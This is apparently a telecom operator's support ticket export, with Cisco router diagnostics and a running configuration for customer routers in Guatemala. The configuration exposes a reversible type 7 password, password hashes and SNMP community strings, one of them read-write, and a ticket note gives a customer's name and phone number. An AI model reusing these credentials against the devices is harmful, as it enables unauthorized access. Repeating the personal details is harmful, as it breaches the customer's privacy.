JUL  6 02:57:11.663: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
JUL  6 02:57:11.915: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUL  6 02:57:11.915: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
JUL  6 02:57:13.115 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
JUL  6 02:57:13.879 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
JUL  6 02:57:14.027 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
JUL  6 02:57:14.027 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE BVI1, CHANGED STATE TO UP
JUL  6 02:57:14.919 UTC: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
JUL  6 02:57:14.919 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
JUL  6 02:57:15.043 UTC: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/1/1, CHANGED STATE TO ADMINISTRATIVELY DOWN
JUL  6 02:57:15.043 UTC: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO ADMINISTRATIVELY DOWN
JUL  6 02:57:15.043 UTC: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/1/3, CHANGED STATE TO ADMINISTRATIVELY DOWN
JUL  6 02:57:15.683 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(2)T1, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2012 BY CISCO SYSTEMS, INC.
COMPILED WED 29-FEB-12 19:19 BY PROD_REL_TEAM
JUL  6 02:57:15.863 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_BANRURAL_GT_AGENCIA_0204 IS UNDERGOING A COLD START
JUL  6 02:57:16.515 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
JUL  6 02:57:16.515 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/1, CHANGED STATE TO DOWN
JUL  6 02:57:16.515 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO DOWN
JUL  6 02:57:16.515 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/3, CHANGED STATE TO DOWN
JUL  6 02:57:16.515 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
JUL  6 02:57:18.479 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
JUL  6 02:57:18.515 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUL  6 02:57:25.099 UTC: %LINK-3-UPDOWN: INTERFACE BVI1, CHANGED STATE TO DOWN
JUL  6 02:57:26.099 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE BVI1, CHANGED STATE TO DOWN
JUL  6 02:57:44.415 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.190.1 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
CC_BANRURAL_GT_AGENCIA_0204#
SHOW CLOCK
03:05:11.991 UTC WED JUL 6 2022
CC_BANRURAL_GT_AGENCIA_0204#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.190.1             3   A4BE.2BE5.7F1F  ARPA   GIGABITETHERNET0/1
INTERNET  10.72.190.9             -   D867.D9B1.F061  ARPA   GIGABITETHERNET0/1
INTERNET  10.72.190.129           3   A4BE.2BE5.7F1F  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.190.136           -   D867.D9B1.F060  ARPA   GIGABITETHERNET0/0
INTERNET  10.132.4.17             -   D867.D9B1.F063  ARPA   VLAN1
INTERNET  10.132.4.22             0   F08E.DB17.9AFA  ARPA   VLAN1
INTERNET  10.162.4.126            -   D867.D9B1.F063  ARPA   VLAN1
INTERNET  10.162.204.126          -   D867.D9B1.F063  ARPA   VLAN1
INTERNET  10.166.41.126           -   D867.D9B1.F063  ARPA   VLAN1
CC_BANRURAL_GT_AGENCIA_0204#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN REDUNDANTE/_/8901532T/_/
GI0/1                          UP             UP       WAN PRINCIPAL/_/8900647T/_/
GI0/1/0                        UP             UP       LAN DEL CLIENTE
GI0/1/1                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/1/2                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/1/3                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
BV1                            DOWN           DOWN     ** PRINCIPAL ID 8900647 **
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_BANRURAL_GT_AGENCIA_0204#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.72.190.136   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         10.72.190.9     YES NVRAM  UP                    UP
GIGABITETHERNET0/1/0       UNASSIGNED      YES UNSET  UP                    UP
GIGABITETHERNET0/1/1       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/1/2       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/1/3       UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
BVI1                       UNASSIGNED      YES UNSET  DOWN                  DOWN
LOOPBACK5                  10.212.107.163  YES NVRAM  UP                    UP
VLAN1                      10.162.4.126    YES NVRAM  UP                    UP
CC_BANRURAL_GT_AGENCIA_0204#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN BANRURAL 10.72.190.136
  PING 10.72.190.136: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.190.136 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 5/5/6 MS
RUTA IP:
PE: 10.179.28.33
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.72.190.136
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.72.190.136/32  DIRECT  0    0                 0.0.0.0         VLANIF2249			</t>
  </si>
  <si>
    <t>F4629413</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR JEFERSON ARCE INDICA QUE SE DEJE EN OBSERVACION POR 24 HRS YA QUE FUE REPORTADO POR INESTABILIDAD TAMBIEN SOLICITO QUE SE ENVIO POR CORREO SI SE REALIZO ACCION CORRECTIVA **
-ID 1001036573
**</t>
  </si>
  <si>
    <t>F4629468</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE PARA PODER VALIDAR CON PRUEBAS REALIZADOS Y REGISTRO DE QUE NO SE TUVO EVENTOS EN NUESTROS EQUIPOS.</t>
  </si>
  <si>
    <t xml:space="preserve">ENLACE OPERATIVO NO SE TINENE REGISTRO DE CAIDA NI ALARMAS EN LE CPE SE PROCEDE A VALIDAR CON EL CLIENTE. POR QUE POR PARTE DE CLARO SE OBSERVA SIN PROBLEMAS DESDE HACE 7 SEMANAS .
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 7 SEMANA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IMSA_GT_INTERNET_Z15 UPTIME IS 7 WEEKS, 9 HOURS, 22 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 21:07:05 UTC TUE MAY 17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18Y05F
2 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250880K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1941/K9          FTX1618Y05F
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_IMSA_GT_INTERNET_Z15#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4241 BYTES
!
! LAST CONFIGURATION CHANGE AT 17:28:28 UTC FRI JUN 17 2022 BY GESTIONIP
! NVRAM CONFIG LAST UPDATED AT 17:17:36 UTC FRI JUN 17 2022 BY GESTIONIP
! NVRAM CONFIG LAST UPDATED AT 17:17:36 UTC FRI JUN 17 2022 BY GESTIONIP
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_IMSA_GT_INTERNET_Z15
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 4 EFGGPN07/DWJB.UGZOURJMJZHPAPLRUWH/NVNVXUK6.
!
NO AAA NEW-MODEL
!
NO IPV6 CEF
!
!
!
!
!
IP DOMAIN LOOKUP SOURCE-INTERFACE GIGABITETHERNET0/1
IP NAME-SERVER 216.230.128.3
IP NAME-SERVER 216.230.128.33
IP CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX1618Y05F
!
!
USERNAME ADMININGENIO PRIVILEGE 10 PASSWORD 7 096F62282B2A5A3B263F25
USERNAME GESTIONIP SECRET 4 J97D2KYDSNA1WFDCO/9OZ72YEJCXHSGT1W6FUL8O/O.
!
!
!
TRACK 1 IP ROUTE 0.0.0.0 0.0.0.0 REACHABILITY
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.111.56 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/54700042T/_/
 BANDWIDTH 30720
 IP ADDRESS 10.31.74.118 255.255.255.252
 IP OSPF NETWORK POINT-TO-POINT
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 181.209.185.238 255.255.255.240 SECONDARY
 IP ADDRESS 186.151.234.94 255.255.255.240
 RATE-LIMIT INPUT 30720000 5760000 11520000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 30720000 5760000 11520000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 STANDBY 200 IP 186.151.234.81
 STANDBY 200 TIMERS MSEC 200 1
 STANDBY 200 PRIORITY 105
 STANDBY 200 PREEMPT
 STANDBY 200 TRACK 1 DECREMENT 10
 STANDBY 201 IP 181.209.185.225
 STANDBY 201 TIMERS MSEC 200 1
 STANDBY 201 PRIORITY 105
 STANDBY 201 PREEMPT
 STANDBY 201 TRACK 1 DECREMENT 10
 NO IP ROUTE-CACHE
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 1000
!
ROUTER OSPF 1
 ROUTER-ID 10.31.74.118
 AREA 6458 NSSA
 REDISTRIBUTE CONNECTED SUBNETS ROUTE-MAP CONNECTED
 NETWORK 10.31.74.116 0.0.0.3 AREA 6458
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
!
!
IP PREFIX-LIST CONNECTED SEQ 5 PERMIT 186.151.234.80/28
IP PREFIX-LIST CONNECTED SEQ 10 PERMIT 10.212.111.56/32
IP PREFIX-LIST CONNECTED SEQ 15 PERMIT 181.209.185.224/28
IP SLA RESPONDER
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
ACCESS-LIST 100 DENY   IP ANY 224.0.0.0 0.0.0.255
ACCESS-LIST 100 PERMIT IP ANY ANY
!
ROUTE-MAP CONNECTED PERMIT 10
 MATCH IP ADDRESS PREFIX-LIST CONNECTED
!
!
SNMP-SERVER COMMUNITY MON000547I RO
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY INGENIORO RO
SNMP-SERVER COMMUNITY INGENIORW RW
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET.- 22 AVENIDA 11-00 ZONA 15 VISTA HERMOSA III
SNMP-SERVER ENABLE TRAPS ENTITY-SENSOR THRESHOLD
!
CONTROL-PLANE
!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IMSA_GT_INTERNET_Z15#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 13024 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 13024 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 13028 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
O PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY4 (156.96.117.42)
JUN 16 12:02:12.147 UTC: %SYS-5-PRIV_AUTH_FAIL: AUTHENTICATION TO PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY3 (156.96.117.42)
JUN 16 12:02:54.719 UTC: %SYS-5-PRIV_AUTH_FAIL: AUTHENTICATION TO PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY3 (156.96.117.42)
JUN 16 12:04:38.851 UTC: %SYS-5-PRIV_AUTH_FAIL: AUTHENTICATION TO PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY2 (156.96.117.42)
JUN 16 12:05:24.555 UTC: %SYS-5-PRIV_AUTH_FAIL: AUTHENTICATION TO PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY0 (156.96.117.42)
JUN 16 12:07:03.675 UTC: %SYS-5-PRIV_AUTH_FAIL: AUTHENTICATION TO PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY4 (156.96.117.42)
JUN 16 12:07:46.711 UTC: %SYS-5-PRIV_AUTH_FAIL: AUTHENTICATION TO PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY4 (156.96.117.42)
JUN 16 12:12:06.587 UTC: %SYS-5-PRIV_AUTH_FAIL: AUTHENTICATION TO PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY1 (156.96.117.42)
JUN 16 12:12:36.463 UTC: %SYS-5-PRIV_AUTH_FAIL: AUTHENTICATION TO PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY1 (156.96.117.42)
JUN 16 12:14:36.467 UTC: %SYS-5-PRIV_AUTH_FAIL: AUTHENTICATION TO PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY3 (156.96.117.42)
JUN 16 12:15:06.935 UTC: %SYS-5-PRIV_AUTH_FAIL: AUTHENTICATION TO PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY3 (156.96.117.42)
JUN 16 12:17:02.815 UTC: %SYS-5-PRIV_AUTH_FAIL: AUTHENTICATION TO PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY4 (156.96.117.42)
JUN 16 12:19:53.311 UTC: %SYS-5-PRIV_AUTH_FAIL: AUTHENTICATION TO PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY1 (156.96.117.42)
JUN 16 12:22:06.927 UTC: %SYS-5-PRIV_AUTH_FAIL: AUTHENTICATION TO PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY4 (156.96.117.42)
JUN 16 12:24:42.159 UTC: %SYS-5-PRIV_AUTH_FAIL: AUTHENTICATION TO PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY3 (156.96.117.42)
JUN 16 12:24:46.631 UTC: %SYS-5-PRIV_AUTH_FAIL: AUTHENTICATION TO PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY4 (156.96.117.42)
JUN 16 12:27:09.695 UTC: %SYS-5-PRIV_AUTH_FAIL: AUTHENTICATION TO PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY4 (156.96.117.42)
JUN 16 12:29:34.927 UTC: %SYS-5-PRIV_AUTH_FAIL: AUTHENTICATION TO PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY2 (156.96.117.42)
JUN 16 12:32:00.723 UTC: %SYS-5-PRIV_AUTH_FAIL: AUTHENTICATION TO PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY3 (156.96.117.42)
JUN 16 12:34:36.263 UTC: %SYS-5-PRIV_AUTH_FAIL: AUTHENTICATION TO PRIVILEGE LEVEL 15 FAILED BY GESTIONIP ON VTY0 (156.96.117.42)
JUN 17 17:09:15.060 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY GESTIONIP ON VTY1 (10.31.74.117)
JUN 17 17:17:35.256 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY GESTIONIP ON VTY0 (10.31.74.117)
JUN 17 17:28:28.348 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY GESTIONIP ON VTY1 (190.56.58.197)
JUN 17 19:25:16.079 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.31.74.253 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 17 19:25:34.303 UTC: %TRACKING-5-STATE: 1 IP ROUTE 0.0.0.0/0 REACHABILITY UP-&gt;DOWN
JUN 17 19:25:34.335 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 200 STATE ACTIVE -&gt; SPEAK
JUN 17 19:25:34.335 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 201 STATE ACTIVE -&gt; SPEAK
JUN 17 19:25:35.455 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 201 STATE SPEAK -&gt; STANDBY
JUN 17 19:25:35.487 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 200 STATE SPEAK -&gt; STANDBY
JUN 17 19:25:48.067 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.31.74.253 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
JUN 17 19:26:04.303 UTC: %TRACKING-5-STATE: 1 IP ROUTE 0.0.0.0/0 REACHABILITY DOWN-&gt;UP
JUN 17 19:26:04.311 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 200 STATE STANDBY -&gt; ACTIVE
JUN 17 19:26:04.327 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 201 STATE STANDBY -&gt; ACTIVE
JUN 17 19:41:37.291 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.31.74.253 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 17 19:41:49.951 UTC: %TRACKING-5-STATE: 1 IP ROUTE 0.0.0.0/0 REACHABILITY UP-&gt;DOWN
JUN 17 19:41:49.959 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 200 STATE ACTIVE -&gt; SPEAK
JUN 17 19:41:50.039 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 201 STATE ACTIVE -&gt; SPEAK
JUN 17 19:41:51.063 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 200 STATE SPEAK -&gt; STANDBY
JUN 17 19:41:51.063 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 201 STATE SPEAK -&gt; STANDBY
JUN 17 19:53:54.539 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.31.74.253 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
JUN 17 19:54:05.431 UTC: %TRACKING-5-STATE: 1 IP ROUTE 0.0.0.0/0 REACHABILITY DOWN-&gt;UP
JUN 17 19:54:05.575 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 201 STATE STANDBY -&gt; ACTIVE
JUN 17 19:54:05.623 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 200 STATE STANDBY -&gt; ACTIVE
JUN 28 16:41:33.839 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.31.74.253 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 28 16:41:39.679 UTC: %TRACKING-5-STATE: 1 IP ROUTE 0.0.0.0/0 REACHABILITY UP-&gt;DOWN
JUN 28 16:41:39.771 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 201 STATE ACTIVE -&gt; SPEAK
JUN 28 16:41:39.851 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 200 STATE ACTIVE -&gt; SPEAK
JUN 28 16:41:40.859 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 201 STATE SPEAK -&gt; STANDBY
JUN 28 16:41:41.035 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 200 STATE SPEAK -&gt; STANDBY
JUN 28 19:36:19.262 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.31.74.253 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
JUN 28 19:36:24.678 UTC: %TRACKING-5-STATE: 1 IP ROUTE 0.0.0.0/0 REACHABILITY DOWN-&gt;UP
JUN 28 19:36:24.798 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 201 STATE STANDBY -&gt; ACTIVE
JUN 28 19:36:24.814 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 200 STATE STANDBY -&gt; ACTIVE
JUN 29 16:23:25.713 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.31.74.253 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 29 16:23:39.581 UTC: %TRACKING-5-STATE: 1 IP ROUTE 0.0.0.0/0 REACHABILITY UP-&gt;DOWN
JUN 29 16:23:39.593 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 201 STATE ACTIVE -&gt; SPEAK
JUN 29 16:23:39.721 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 200 STATE ACTIVE -&gt; SPEAK
JUN 29 16:23:40.681 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 201 STATE SPEAK -&gt; STANDBY
JUN 29 16:23:40.873 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 200 STATE SPEAK -&gt; STANDBY
JUN 29 19:35:07.420 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.31.74.253 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
JUN 29 19:35:18.780 UTC: %TRACKING-5-STATE: 1 IP ROUTE 0.0.0.0/0 REACHABILITY DOWN-&gt;UP
JUN 29 19:35:18.848 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 201 STATE STANDBY -&gt; ACTIVE
JUN 29 19:35:18.960 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 200 STATE STANDBY -&gt; ACTIVE
JUN 29 23:24:39.851 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.31.74.253 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 29 23:24:41.003 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.31.74.253 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
JUN 30 17:04:27.879 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.31.74.253 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 30 17:04:36.043 UTC: %TRACKING-5-STATE: 1 IP ROUTE 0.0.0.0/0 REACHABILITY UP-&gt;DOWN
JUN 30 17:04:36.107 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 200 STATE ACTIVE -&gt; SPEAK
JUN 30 17:04:36.155 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 201 STATE ACTIVE -&gt; SPEAK
JUN 30 17:04:37.195 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 200 STATE SPEAK -&gt; STANDBY
JUN 30 17:04:37.227 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 201 STATE SPEAK -&gt; STANDBY
JUN 30 22:59:02.673 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.31.74.253 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
JUN 30 22:59:08.109 UTC: %TRACKING-5-STATE: 1 IP ROUTE 0.0.0.0/0 REACHABILITY DOWN-&gt;UP
JUN 30 22:59:08.129 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 201 STATE STANDBY -&gt; ACTIVE
JUN 30 22:59:08.273 UTC: %HSRP-5-STATECHANGE: GIGABITETHERNET0/1 GRP 200 STATE STANDBY -&gt; ACTIVE
CC_IMSA_GT_INTERNET_Z15#
SHOW CLOCK
06:30:05.709 UTC WED JUL 6 2022
CC_IMSA_GT_INTERNET_Z15#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.31.74.117            2   DC99.147A.A579  ARPA   GIGABITETHERNET0/0
INTERNET  10.31.74.118            -   2C54.2D28.CF20  ARPA   GIGABITETHERNET0/0
INTERNET  181.209.185.225         -   0000.0C07.ACC9  ARPA   GIGABITETHERNET0/1
INTERNET  181.209.185.226         0   D4F4.BEAF.2217  ARPA   GIGABITETHERNET0/1
INTERNET  181.209.185.227         0   INCOMPLETE      ARPA
INTERNET  181.209.185.228         0   INCOMPLETE      ARPA
INTERNET  181.209.185.229         0   INCOMPLETE      ARPA
INTERNET  181.209.185.230         0   INCOMPLETE      ARPA
INTERNET  181.209.185.231         0   INCOMPLETE      ARPA
INTERNET  181.209.185.232         0   INCOMPLETE      ARPA
INTERNET  181.209.185.233         0   INCOMPLETE      ARPA
INTERNET  181.209.185.234         0   INCOMPLETE      ARPA
INTERNET  181.209.185.237       186   78DA.6E9C.05A1  ARPA   GIGABITETHERNET0/1
